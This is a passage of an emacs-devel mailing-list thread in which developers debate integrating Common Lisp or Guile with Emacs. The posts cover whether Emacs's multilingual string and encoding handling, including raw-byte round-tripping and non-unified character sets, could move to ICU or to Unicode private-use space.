>> Of course, another issue with Common-Lisp integration is that we'd
>> want to figure out how to integrate the two languages.  So, we'd need
>> to investigate what are the current incompatibilities.
> Running ELisp code in CL has been supported for 15 years.
> http://sourceforge.net/p/clocc/hg/ci/default/tree/src/cllib/elisp.lisp

As mentioned when someone pointed to a CL-to-Elisp compiler, compiling
one language to another is actually slightly different from integrating
two language.


        Stefan



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-19  0:56         ` Stefan Monnier
@ 2014-09-19 12:24           ` Sam Steingold
  0 siblings, 0 replies; 261+ messages in thread
From: Sam Steingold @ 2014-09-19 12:24 UTC (permalink / raw)
  To: emacs-devel

> * Stefan Monnier <zbaavre@veb.hzbagerny.pn> [2014-09-18 20:56:49 -0400]:
>
>>> * Stefan Monnier <zbaavre@veb.hzbagerny.pn> [2014-09-17 13:53:45 -0400]:
>>> Of course, another issue with Common-Lisp integration is that we'd
>>> want to figure out how to integrate the two languages.  So, we'd need
>>> to investigate what are the current incompatibilities.
>> Running ELisp code in CL has been supported for 15 years.
>> http://sourceforge.net/p/clocc/hg/ci/default/tree/src/cllib/elisp.lisp
>
> As mentioned when someone pointed to a CL-to-Elisp compiler, compiling
> one language to another is actually slightly different from
> integrating two language.

I am puzzled by this distinction.

When you load elisp.lisp into your CL, you can

* load ELisp files, e.g.,
>>> (el::load "backquote")
>>> (el::load "calendar")
>>> (el::load "cal-hebrew")
>>> (el::load "subr")
>>> (el::load "help")

* Compile them:
>>> (cllib::compile-el-file "backquote")
>>> (cllib::compile-el-file "calendar")
>>> (cllib::compile-el-file "cal-hebrew")

* Run ELisp code:
>>> (el::calendar-hebrew-date-string)

I am not sure what if missing.

-- 
Sam Steingold (http://sds.podval.org/) on darwin Ns 10.3.1265
http://www.childpsy.net/ http://islamexposedonline.com
http://americancensorship.org http://memri.org http://mideasttruth.com
Just because you're paranoid doesn't mean they AREN'T after you.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-17  7:38 Emacs Lisp's future (was: Guile emacs thread (again)) Kristian Nygaard Jensen
  2014-09-17 15:15 ` Emacs Lisp's future Stefan Monnier
@ 2014-09-26 13:43 ` Robin Templeton
  2014-09-26 14:15   ` David Kastrup
  1 sibling, 1 reply; 261+ messages in thread
From: Robin Templeton @ 2014-09-26 13:43 UTC (permalink / raw)
  To: emacs-devel

Kristian Nygaard Jensen <freeduck@member.fsf.org> writes:

>> Of course, that's for the language side, but on the implementation side,
>> I don't really know what Common-Lisp implementation we could re-use
>> (both GNU implementations are dormant, so there's no manpower for us
>> tap into).  Still: there are many Common-Lisp implementations out there,
>> so there's probably one that could work for us.
>
> Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems
> alive, it is lgpl, so there would be no license issue

ECL's maintainer resigned last year:
<http://permalink.gmane.org/gmane.lisp.ecl.general/10264>. There have
been no releases since, and recent mailing list posts indicate that
there is no current maintainer.

-- 
Inteligenta persono lernas la lingvon Esperanton rapide kaj facile.
Esperanto estas moderna, kultura lingvo por la mondo. Simpla, fleksebla,
belsona, Esperanto estas la praktika solvo de la problemo de universala
interkompreno. Lernu la interlingvon Esperanton!




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-26 13:43 ` Robin Templeton
@ 2014-09-26 14:15   ` David Kastrup
  2014-09-26 14:45     ` Dmitry Antipov
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-09-26 14:15 UTC (permalink / raw)
  To: emacs-devel

Robin Templeton <robin@terpri.org> writes:

> Kristian Nygaard Jensen <freeduck@member.fsf.org> writes:
>
>>> Of course, that's for the language side, but on the implementation side,
>>> I don't really know what Common-Lisp implementation we could re-use
>>> (both GNU implementations are dormant, so there's no manpower for us
>>> tap into).  Still: there are many Common-Lisp implementations out there,
>>> so there's probably one that could work for us.
>>
>> Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems
>> alive, it is lgpl, so there would be no license issue
>
> ECL's maintainer resigned last year:
> <http://permalink.gmane.org/gmane.lisp.ecl.general/10264>. There have
> been no releases since, and recent mailing list posts indicate that
> there is no current maintainer.

While not an example for how to keep one's temper, in the course of
<URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=18520> I suggest that
Emacs buffers could be based on string ports with random access.

The basic idea here is, of course, that the fundamental operation of a
string port is adding unknown amounts of material "at point".
Personally, I think that there is a lot of potential to tie strings,
encodings, buffers, ports quite closely together in Emacs and Guile, and
part of that reason is that I consider Emacs' multinational
string/buffer/multibyte/unibyte handling a lot more mature in concepts
and implementation than that of GUILE.  Scheme does not prescribe a
whole lot regarding the details of character sets and string handling
(except that Scheme strings tend to have a stronger focus on being
rewritable, something that works pretty badly on variable-length
encodings but which Emacs purports to support at least using aset).  And
I think that the user and application pressure on Emacs/MULE in that
regard has in the time since Emacs 20 lead to pretty good solutions.

GUILE in particular has problems coming to grips about the difference
between "internal UTF-8 based encoding" and "external UTF-8 encoding
which might contain bytes violating the UTF-8 guarantees" and not having
unnecessary crossbleed between them.  Since Emacs historically had a
completely different internal multibyte encoding, it has kept those
apart much cleaner.

If GUILE wants to take over Emacs regarding its computing, I think it
first has to get itself infiltrated by Emacs' handling of strings and
buffers.  I have no idea whether this should go as far as to replace
iconv with CCL programs.  It would have the advantage of using actively
maintained and used GNU-controlled technology for the multi-language
stuff (and Emacs is rather good in that area), but I have no idea how
good a fit this could be.

At any rate: the Scheme standards leave a lot things open regarding
actual multinational character set and string support, and I feel that
the historic pressure of the text-based Emacs might have done a better
job so far of producing concepts and results that work well in practice
than what the GUILE developers were forced to work with regarding
foreign alphabets.

So instead of interfacing one to the other, I think GUILE has more to
win than to lose by adopting some of the Emacs concepts and data models
regarding text/string processing rather than designing its own.

-- 
David Kastrup




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-26 14:15   ` David Kastrup
@ 2014-09-26 14:45     ` Dmitry Antipov
  2014-09-26 15:05       ` David Kastrup
  2014-09-26 15:07       ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Dmitry Antipov @ 2014-09-26 14:45 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

On 09/26/2014 06:15 PM, David Kastrup wrote:

> So instead of interfacing one to the other, I think GUILE has more to
> win than to lose by adopting some of the Emacs concepts and data models
> regarding text/string processing rather than designing its own.

Adopting Emacs?  Why not just use ICU?  This project's page claims about
"GPL-compatible" free license (http://userguide.icu-project.org/icufaq).

Dmitry




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-26 14:45     ` Dmitry Antipov
@ 2014-09-26 15:05       ` David Kastrup
  2014-09-27  8:44         ` Stephen J. Turnbull
  2014-09-26 15:07       ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-09-26 15:05 UTC (permalink / raw)
  To: Dmitry Antipov; +Cc: emacs-devel

Dmitry Antipov <dmantipov@yandex.ru> writes:

> On 09/26/2014 06:15 PM, David Kastrup wrote:
>
>> So instead of interfacing one to the other, I think GUILE has more to
>> win than to lose by adopting some of the Emacs concepts and data models
>> regarding text/string processing rather than designing its own.
>
> Adopting Emacs?  Why not just use ICU?  This project's page claims about
> "GPL-compatible" free license (http://userguide.icu-project.org/icufaq).

Because ICU is not under the control of the GNU project.  Whenever there
is a need that needs to be fulfilled, it is not a priority for ICU.  For
example, it is an error for ICU if some string cannot properly be
decoded.

Emacs is capable of decoding random byte strings "as utf-8" and reencode
them afterwards resulting in the original byte string, by using special
characters to indicate "undecodable byte".  This means that if you edit
some source code file where comments have been added in different
encodings, or which contains strings in several different encodings for
whatever reason, you can save the file afterwards and have it only
changed in those sections you actually edited, without any modifications
in sections you did not touch but which still had to go through decoding
on load and encoding on save.

For an editor, those are very important features.  For a third-party
library, stuff like that may not be a priority.

In addition, Emacs' string handling and encoding/reencoding has a longer
history than UTF-8 and most such libraries.  It's mature, and it
definitely fits Emacs' bill.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-26 14:45     ` Dmitry Antipov
  2014-09-26 15:05       ` David Kastrup
@ 2014-09-26 15:07       ` Eli Zaretskii
  2014-09-26 15:21         ` David Kastrup
  2014-09-27  8:35         ` Stephen J. Turnbull
  1 sibling, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-09-26 15:07 UTC (permalink / raw)
  To: Dmitry Antipov; +Cc: dak, emacs-devel

> Date: Fri, 26 Sep 2014 18:45:54 +0400
> From: Dmitry Antipov <dmantipov@yandex.ru>
> Cc: emacs-devel@gnu.org
> 
> Why not just use ICU?

Emacs needs to be able to extend the Unicode code-point space for raw
8-bit bytes and for a couple of character sets that are not unified.
Can ICU support that?  If not, we cannot base our implementation on
ICU without a lot of redesign.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-26 15:07       ` Eli Zaretskii
@ 2014-09-26 15:21         ` David Kastrup
  2014-09-27  8:35         ` Stephen J. Turnbull
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-09-26 15:21 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: Dmitry Antipov, emacs-devel

Eli Zaretskii <eliz@gnu.org> writes:

>> Date: Fri, 26 Sep 2014 18:45:54 +0400
>> From: Dmitry Antipov <dmantipov@yandex.ru>
>> Cc: emacs-devel@gnu.org
>> 
>> Why not just use ICU?
>
> Emacs needs to be able to extend the Unicode code-point space for raw
> 8-bit bytes and for a couple of character sets that are not unified.
> Can ICU support that?  If not, we cannot base our implementation on
> ICU without a lot of redesign.

Well, the context here was the integration of Emacs and GUILE, and it
would be optimistic to think that efficient string/buffer handling will
not leave us with a lot of redesign either way.

Matching GUILE and Emacs allows us to compare and integrate the best
approaches from either side.  With ICU, it will always be "take it or
leave it".  It may be good enough.  If it isn't in some small respect,
getting it changed or fixed is not under our control.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-26 15:07       ` Eli Zaretskii
  2014-09-26 15:21         ` David Kastrup
@ 2014-09-27  8:35         ` Stephen J. Turnbull
  2014-09-27  8:49           ` David Kastrup
  2014-09-27  9:32           ` Eli Zaretskii
  1 sibling, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-09-27  8:35 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: Dmitry Antipov, dak, emacs-devel

Eli Zaretskii writes:
 > > Date: Fri, 26 Sep 2014 18:45:54 +0400
 > > From: Dmitry Antipov <dmantipov@yandex.ru>
 > > Cc: emacs-devel@gnu.org
 > > 
 > > Why not just use ICU?
 > 
 > Emacs needs to be able to extend the Unicode code-point space for raw
 > 8-bit bytes and for a couple of character sets that are not unified.

No, you don't.  There's plenty of private space for those purposes
(unless you know of private character sets that use more than two
whole planes?)  Emacs would simply use an indirect representation for
private space.  (That is, code points in private space are not
necessarily identical to the input code points, but rather are indexes
into an auxiliary table which implements the disjoint sum of the
private code spaces in use.)

Since this is private space, you need to build a table of attributes
for these characters (I/O representation, UCD properties, glyphs, etc)
anyway.  For Unicode input using private space, you just record that
as the I/O representation.

 > Can ICU support that?

Maybe it would be unhappy if you used a lone surrogate representation
(or other representation using integers outside of the Unicode
character space) for those "extended code points", but as proposed
above you can efficiently use private space in practice.







^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-26 15:05       ` David Kastrup
@ 2014-09-27  8:44         ` Stephen J. Turnbull
  2014-09-27  8:59           ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-09-27  8:44 UTC (permalink / raw)
  To: David Kastrup; +Cc: Dmitry Antipov, emacs-devel

David Kastrup writes:
 > Dmitry Antipov <dmantipov@yandex.ru> writes:

 > > Adopting Emacs?  Why not just use ICU?  This project's page claims about
 > > "GPL-compatible" free license (http://userguide.icu-project.org/icufaq).
 > 
 > Because ICU is not under the control of the GNU project.

You can say the same about the Linux kernel, for example.
Nevertheless, the HURD has never made it to ready-for-prime-time
status.  At some point it's worth delegating maintenance of 99% of
your needs to another project, and Emacs has already been through the
Mule-to-Unicode internal encoding conversion.  Would you really wish
that on another project?

 > In addition, Emacs' string handling and encoding/reencoding has a
 > longer history than UTF-8 and most such libraries.  It's mature,
 > and it definitely fits Emacs' bill.

I really doubt it will take much effort to move Emacs to ICU (compared
to grafting Emacs's complex internal facilities onto another project).




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27  8:35         ` Stephen J. Turnbull
@ 2014-09-27  8:49           ` David Kastrup
  2014-09-27  9:32           ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-09-27  8:49 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: Eli Zaretskii, Dmitry Antipov, emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Eli Zaretskii writes:
>  > > Date: Fri, 26 Sep 2014 18:45:54 +0400
>  > > From: Dmitry Antipov <dmantipov@yandex.ru>
>  > > Cc: emacs-devel@gnu.org
>  > > 
>  > > Why not just use ICU?
>  > 
>  > Emacs needs to be able to extend the Unicode code-point space for raw
>  > 8-bit bytes and for a couple of character sets that are not unified.
>
> No, you don't.  There's plenty of private space for those purposes
> (unless you know of private character sets that use more than two
> whole planes?)  Emacs would simply use an indirect representation for
> private space.  (That is, code points in private space are not
> necessarily identical to the input code points, but rather are indexes
> into an auxiliary table which implements the disjoint sum of the
> private code spaces in use.)
>
> Since this is private space, you need to build a table of attributes
> for these characters (I/O representation, UCD properties, glyphs, etc)
> anyway.  For Unicode input using private space, you just record that
> as the I/O representation.
>
>  > Can ICU support that?
>
> Maybe it would be unhappy if you used a lone surrogate representation
> (or other representation using integers outside of the Unicode
> character space) for those "extended code points", but as proposed
> above you can efficiently use private space in practice.

Except that Emacs, as an editor, needs to support the private spaces
users might want to use.  Hijacking the surrogates is a reasonable
compromise.  Another would have been hijacking the 4-byte encodable code
space beyond Unicode character 1114111 that is outside of UTF-8 but
inside of the coding scheme's logic and thus working equally well for
string manipulations: however, that would cause unencodable bytes to
take up more space.  I think LuaTeX may use that strategy.

Being an editor, Emacs has to be more circumspect than most other
encoding-sensitive applications about what it may work with since
everything that is "private" may well be within the range that a user
wants to be able to put into string literals.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27  8:44         ` Stephen J. Turnbull
@ 2014-09-27  8:59           ` David Kastrup
  2014-09-27 15:30             ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-09-27  8:59 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: Dmitry Antipov, emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> David Kastrup writes:
>  > Dmitry Antipov <dmantipov@yandex.ru> writes:
>
>  > > Adopting Emacs?  Why not just use ICU?  This project's page claims about
>  > > "GPL-compatible" free license (http://userguide.icu-project.org/icufaq).
>  > 
>  > Because ICU is not under the control of the GNU project.
>
> You can say the same about the Linux kernel, for example.

The last time I looked, Emacs ran on more platforms than GNU/Linux.  We
don't have a tie-in here.

> Nevertheless, the HURD has never made it to ready-for-prime-time
> status.  At some point it's worth delegating maintenance of 99% of
> your needs to another project, and Emacs has already been through the
> Mule-to-Unicode internal encoding conversion.  Would you really wish
> that on another project?

The point is that "GUILE" and "Emacs" are slated to be linked, and that
will not happen if that would seriously degrade Emacs' usability for
working with texts.  It is a core capability of Emacs we are talking
about here.

>  > In addition, Emacs' string handling and encoding/reencoding has a
>  > longer history than UTF-8 and most such libraries.  It's mature,
>  > and it definitely fits Emacs' bill.
>
> I really doubt it will take much effort to move Emacs to ICU (compared
> to grafting Emacs's complex internal facilities onto another project).

If it would not take much effort, then it should be attempted
independently.  Only in that manner can one properly estimate the
respective performance, footprint, programming and compatibility impacts
independently from those of moving to GUILE.

But that still does not touch the problem of making a core tenet of
Emacs, one where Emacs needs to perform better and more versatile than
most other applications and where we are talking about much more
performance-relevant behavior than for most applications, depend on an
externally controlled and maintained library.

That's a particularly important reason for evaluating an ICU dependency
in a separate branch independent from GUILE first.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27  8:35         ` Stephen J. Turnbull
  2014-09-27  8:49           ` David Kastrup
@ 2014-09-27  9:32           ` Eli Zaretskii
  2014-09-27 10:37             ` Stephen J. Turnbull
  2014-09-29 13:17             ` K. Handa
  1 sibling, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-09-27  9:32 UTC (permalink / raw)
  To: Stephen J. Turnbull, Kenichi Handa; +Cc: dmantipov, dak, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Date: Sat, 27 Sep 2014 17:35:12 +0900
> Cc: Dmitry Antipov <dmantipov@yandex.ru>, dak@gnu.org, emacs-devel@gnu.org
> 
> Eli Zaretskii writes:
>  > > Date: Fri, 26 Sep 2014 18:45:54 +0400
>  > > From: Dmitry Antipov <dmantipov@yandex.ru>
>  > > Cc: emacs-devel@gnu.org
>  > > 
>  > > Why not just use ICU?
>  > 
>  > Emacs needs to be able to extend the Unicode code-point space for raw
>  > 8-bit bytes and for a couple of character sets that are not unified.
> 
> No, you don't.  There's plenty of private space for those purposes
> (unless you know of private character sets that use more than two
> whole planes?)

I take it that you have studied the charsets for which we use
codepoints above 0x10FFFF, and concluded that they all fit in the
2*64K+6.4K PUA space provided by Unicode?  We have several quite large
character sets which need that (grep mule-conf.el for ":unify-map" to
see the list, and see etc/charsets/ for the map files).  I'm not sure
the PUA space is large enough, but I didn't sum all the numbers.

In any case, the question why we don't use PUA for this is best
addressed to Handa-san (CC'ed).

> Emacs would simply use an indirect representation for
> private space.  (That is, code points in private space are not
> necessarily identical to the input code points, but rather are indexes
> into an auxiliary table which implements the disjoint sum of the
> private code spaces in use.)

IIUC, this is a non-trivial complication.  Currently, our mapping is
set up so that we can keep the non-unified characters in our buffers,
while you propose indirection via tables.  This means, for example,
that direct access to char-tables will become slower.

> Since this is private space, you need to build a table of attributes
> for these characters (I/O representation, UCD properties, glyphs, etc)
> anyway.  For Unicode input using private space, you just record that
> as the I/O representation.

Yes, and the question is how well does ICU support setting up these.
I don't know the answer to that.

It is also not clear to me whether what you suggest will support the
internal representation of raw bytes and their conversion to and from
their external (a.k.a. "encoded") 8-bit values.

In any case, I agree that using ICU in Guile would be a huge step
forward, because currently they simply rely on the underlying libc,
which is only a more-or-less safe bet when libc is glibc; if not, the
results fall very short of what the user needs and Emacs expects.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27  9:32           ` Eli Zaretskii
@ 2014-09-27 10:37             ` Stephen J. Turnbull
  2014-09-27 11:13               ` David Kastrup
  2014-09-29 13:17             ` K. Handa
  1 sibling, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-09-27 10:37 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: Kenichi Handa, dmantipov, dak, emacs-devel

Eli Zaretskii writes:

 > I take it that you have studied the charsets for which we use
 > codepoints above 0x10FFFF, and concluded that they all fit in the
 > 2*64K+6.4K PUA space provided by Unicode?

No, I've studied the coded character sets that are actually used by
real people in this world, and concluded that for practical purposes,
the Unicode coded character set plus the PUA permits representing all
of them satisfactorily for a TTY, and that the additional burden of
disambiguating them (eg, for font choice in a GUI) should be handled
by markup (eg, the XML lang attribute in text/* representations, and
text properties in Emacs).

 > We have several quite large character sets which need that (grep
 > mule-conf.el for ":unify-map" to see the list, and see
 > etc/charsets/ for the map files).  I'm not sure the PUA space is
 > large enough, but I didn't sum all the numbers.

If :unify-map really means that all of those character sets are mapped
injectively into the Emacs coded character set, OK, it's just Mule
code all over again.  Since CNS alone has about 80,000 characters in
it and that's just for a start, no, there is not enough space in the
Unicode PUA for complete (and mostly redundant) copies of a double
handful of Han character sets.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 10:37             ` Stephen J. Turnbull
@ 2014-09-27 11:13               ` David Kastrup
  2014-09-27 12:00                 ` Eli Zaretskii
  2014-09-27 15:34                 ` Stephen J. Turnbull
  0 siblings, 2 replies; 261+ messages in thread
From: David Kastrup @ 2014-09-27 11:13 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: Kenichi Handa, Eli Zaretskii, dmantipov, emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Eli Zaretskii writes:
>
>  > I take it that you have studied the charsets for which we use
>  > codepoints above 0x10FFFF, and concluded that they all fit in the
>  > 2*64K+6.4K PUA space provided by Unicode?
>
> No, I've studied the coded character sets that are actually used by
> real people in this world, and concluded that for practical purposes,

For practical purposes, real people use Microsoft Word.

> the Unicode coded character set plus the PUA permits representing all
> of them satisfactorily for a TTY, and that the additional burden of
> disambiguating them (eg, for font choice in a GUI) should be handled
> by markup (eg, the XML lang attribute in text/* representations, and
> text properties in Emacs).

Emacs has invested a lot of work and energy into getting encodings
right.  MULE was the principal reason for the last large migration of
Emacs users to XEmacs (around Emacs 20), and it was a significant reason
for a slow but steady migration trickle back when multinational
character sets became ubiquitous and the initial painful investment of
Emacs into them paid back in the form of a longer matured
implementation.  I remember XEmacs having an implementation of the
"works for real people for practical purposes" kind where the principal
maintainers do not appear to be fundamentally immersed in the problem
space.  Because those for which multinational character sets were an
essential feature went to work on and with Emacs instead.

Whether or not that's revisionism, I think that there is little doubt
that Emacs has a solid history of experience dealing with Far Eastern
character sets and texts.  The same cannot be said for R->L typesetting.
However, the problems specific to R->L typesetting are mostly not in the
character set and string handling area but rather concern the display
algorithms where we already found that supporting all the functionality
of Emacs is not well-supported by industry-standard solutions like
Pango.

In short, it is not likely we are talking about a no-brainer regarding
rebasing MULE on something else.  If we were, it would appear to me that
XEmacs would have had more to gain from such a step than Emacs, and
there is likely some reason that they chose not to do so.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 11:13               ` David Kastrup
@ 2014-09-27 12:00                 ` Eli Zaretskii
  2014-09-27 14:04                   ` Stefan Monnier
  2014-09-27 15:34                 ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-09-27 12:00 UTC (permalink / raw)
  To: David Kastrup; +Cc: handa, stephen, dmantipov, emacs-devel

> From: David Kastrup <dak@gnu.org>
> Cc: Eli Zaretskii <eliz@gnu.org>,  Kenichi Handa <handa@gnu.org>,  dmantipov@yandex.ru,  emacs-devel@gnu.org
> Date: Sat, 27 Sep 2014 13:13:26 +0200
> 
> However, the problems specific to R->L typesetting are mostly not in the
> character set and string handling area but rather concern the display
> algorithms where we already found that supporting all the functionality
> of Emacs is not well-supported by industry-standard solutions like
> Pango.

Only people who don't speak any of the R2L languages can seriously
claim that using Pango/Cairo is the way to support R2L in Emacs.
There are just too many quirks that Emacs needs for user satisfaction
that an external GP renderer can never provide.

Using Pango also means you are at the mercy of their developers as far
as bidi is concerned.  And it doesn't help that the development in
that area is not really "alive and kicking" as one would hope; e.g.,
the latest changes in UAX#9, released with Unicode 6.3 a year ago, are
still not supported in Pango or FriBidi.

Besides, using Pango means no bidi in text-mode frames.  (Some people
say this should be delegated to bidi-aware terminal emulators, like
PuTTY and some Linux-based emulator whose name I don't remember, but
that's again only because those people don't use the R2L scripts.
Doing bidi display for TTY Emacs this way is simply unworkable.)



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 12:00                 ` Eli Zaretskii
@ 2014-09-27 14:04                   ` Stefan Monnier
  2014-09-27 14:24                     ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-27 14:04 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: handa, stephen, David Kastrup, dmantipov, emacs-devel

Could you move on to some other discussion?
I mean, it's not like this is a problem we need to fix now (if ever).
So let's cross this bridge when we get there.


        Stefan


>>>>> "Eli" == Eli Zaretskii <eliz@gnu.org> writes:

>> From: David Kastrup <dak@gnu.org>
>> Cc: Eli Zaretskii <eliz@gnu.org>,  Kenichi Handa <handa@gnu.org>,
>> dmantipov@yandex.ru,  emacs-devel@gnu.org
>> Date: Sat, 27 Sep 2014 13:13:26 +0200
>> 
>> However, the problems specific to R->L typesetting are mostly not in the
>> character set and string handling area but rather concern the display
>> algorithms where we already found that supporting all the functionality
>> of Emacs is not well-supported by industry-standard solutions like
>> Pango.

> Only people who don't speak any of the R2L languages can seriously
> claim that using Pango/Cairo is the way to support R2L in Emacs.
> There are just too many quirks that Emacs needs for user satisfaction
> that an external GP renderer can never provide.

> Using Pango also means you are at the mercy of their developers as far
> as bidi is concerned.  And it doesn't help that the development in
> that area is not really "alive and kicking" as one would hope; e.g.,
> the latest changes in UAX#9, released with Unicode 6.3 a year ago, are
> still not supported in Pango or FriBidi.

> Besides, using Pango means no bidi in text-mode frames.  (Some people
> say this should be delegated to bidi-aware terminal emulators, like
> PuTTY and some Linux-based emulator whose name I don't remember, but
> that's again only because those people don't use the R2L scripts.
> Doing bidi display for TTY Emacs this way is simply unworkable.)



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 14:04                   ` Stefan Monnier
@ 2014-09-27 14:24                     ` David Kastrup
  2014-09-27 15:24                       ` Stefan Monnier
                                         ` (2 more replies)
  0 siblings, 3 replies; 261+ messages in thread
From: David Kastrup @ 2014-09-27 14:24 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel

Stefan Monnier <monnier@iro.umontreal.ca> writes:

> Could you move on to some other discussion?
> I mean, it's not like this is a problem we need to fix now (if ever).

Uh, Pango was an analogy example.  The actual question was whether Emacs
can or should delegate its character encoding/decoding processing (not
really significantly related to Pango but subject to similar
considerations) to GUILE's current mechanisms.  Which seem to be
libunistring via libiconv (both GNU libraries it would appear) rather
than the ICU mentioned elsewhere.

> So let's cross this bridge when we get there.

The GUILE bridge is there.  Robin Templeton's status of the port is that
it is mostly complete, with strings/buffers being the most notable part
obliterating acceptable performance via thick glue layers between Emacs'
and GUILE's different implementations of similar concepts.

Removing the thick glue layer requires that Emacs and GUILE strings (and
Emacs buffers and GUILE whatever) become exchangeable and offer the same
operations without impacting performance for either.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 14:24                     ` David Kastrup
@ 2014-09-27 15:24                       ` Stefan Monnier
  2014-09-27 15:41                         ` David Kastrup
  2014-09-27 17:04                       ` Taylan Ulrich Bayirli/Kammer
  2014-09-27 19:33                       ` Robin Templeton
  2 siblings, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-27 15:24 UTC (permalink / raw)
  To: David Kastrup; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel

>> Could you move on to some other discussion?
>> I mean, it's not like this is a problem we need to fix now (if ever).
> Uh, Pango was an analogy example.  The actual question was whether Emacs
> can or should delegate its character encoding/decoding processing (not
> really significantly related to Pango but subject to similar
> considerations) to GUILE's current mechanisms.  Which seem to be
> libunistring via libiconv (both GNU libraries it would appear) rather
> than the ICU mentioned elsewhere.

And, again: it's not like this is a problem we need to fix now (if ever).

> The GUILE bridge is there.  Robin Templeton's status of the port is that
> it is mostly complete, with strings/buffers being the most notable part
> obliterating acceptable performance via thick glue layers between Emacs'
> and GUILE's different implementations of similar concepts.

Do you know this to be a fact?  AFAIK, Guile-Emacs could perfectly live
with having Emacs buffers, Emacs strings, and Scheme strings, with no
extra cost, except when you *want* to convert between them (but as long
as you don't run any Scheme, you shouldn't need/want to do any such
conversion).


        Stefan



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27  8:59           ` David Kastrup
@ 2014-09-27 15:30             ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-09-27 15:30 UTC (permalink / raw)
  To: David Kastrup; +Cc: Dmitry Antipov, emacs-devel

David Kastrup writes:

 > If it would not take much effort, then it should be attempted
 > independently.

Oh, it will.  But given what I've already got on my schedule, if I get
to it before Emacs does, shame on Emacs.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 11:13               ` David Kastrup
  2014-09-27 12:00                 ` Eli Zaretskii
@ 2014-09-27 15:34                 ` Stephen J. Turnbull
  1 sibling, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-09-27 15:34 UTC (permalink / raw)
  To: David Kastrup; +Cc: Kenichi Handa, Eli Zaretskii, dmantipov, emacs-devel

David Kastrup writes:

 > In short, it is not likely we are talking about a no-brainer regarding
 > rebasing MULE on something else.  If we were, it would appear to me that
 > XEmacs would have had more to gain from such a step than Emacs, and
 > there is likely some reason that they chose not to do so.

The reason for using Mule code in XEmacs in the first place was that
by the time anybody who understood multilingual processing because
they suffered from from it, Sun had already awarded the contract to
Ben et al and it was a done deal.  Since then, we haven't fixed it
because I'm at best slow and mistake-prone as a programmer, and nobody
else really cares.  Believe me, I *want* to do it.






^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 15:24                       ` Stefan Monnier
@ 2014-09-27 15:41                         ` David Kastrup
  2014-09-27 15:57                           ` Stefan Monnier
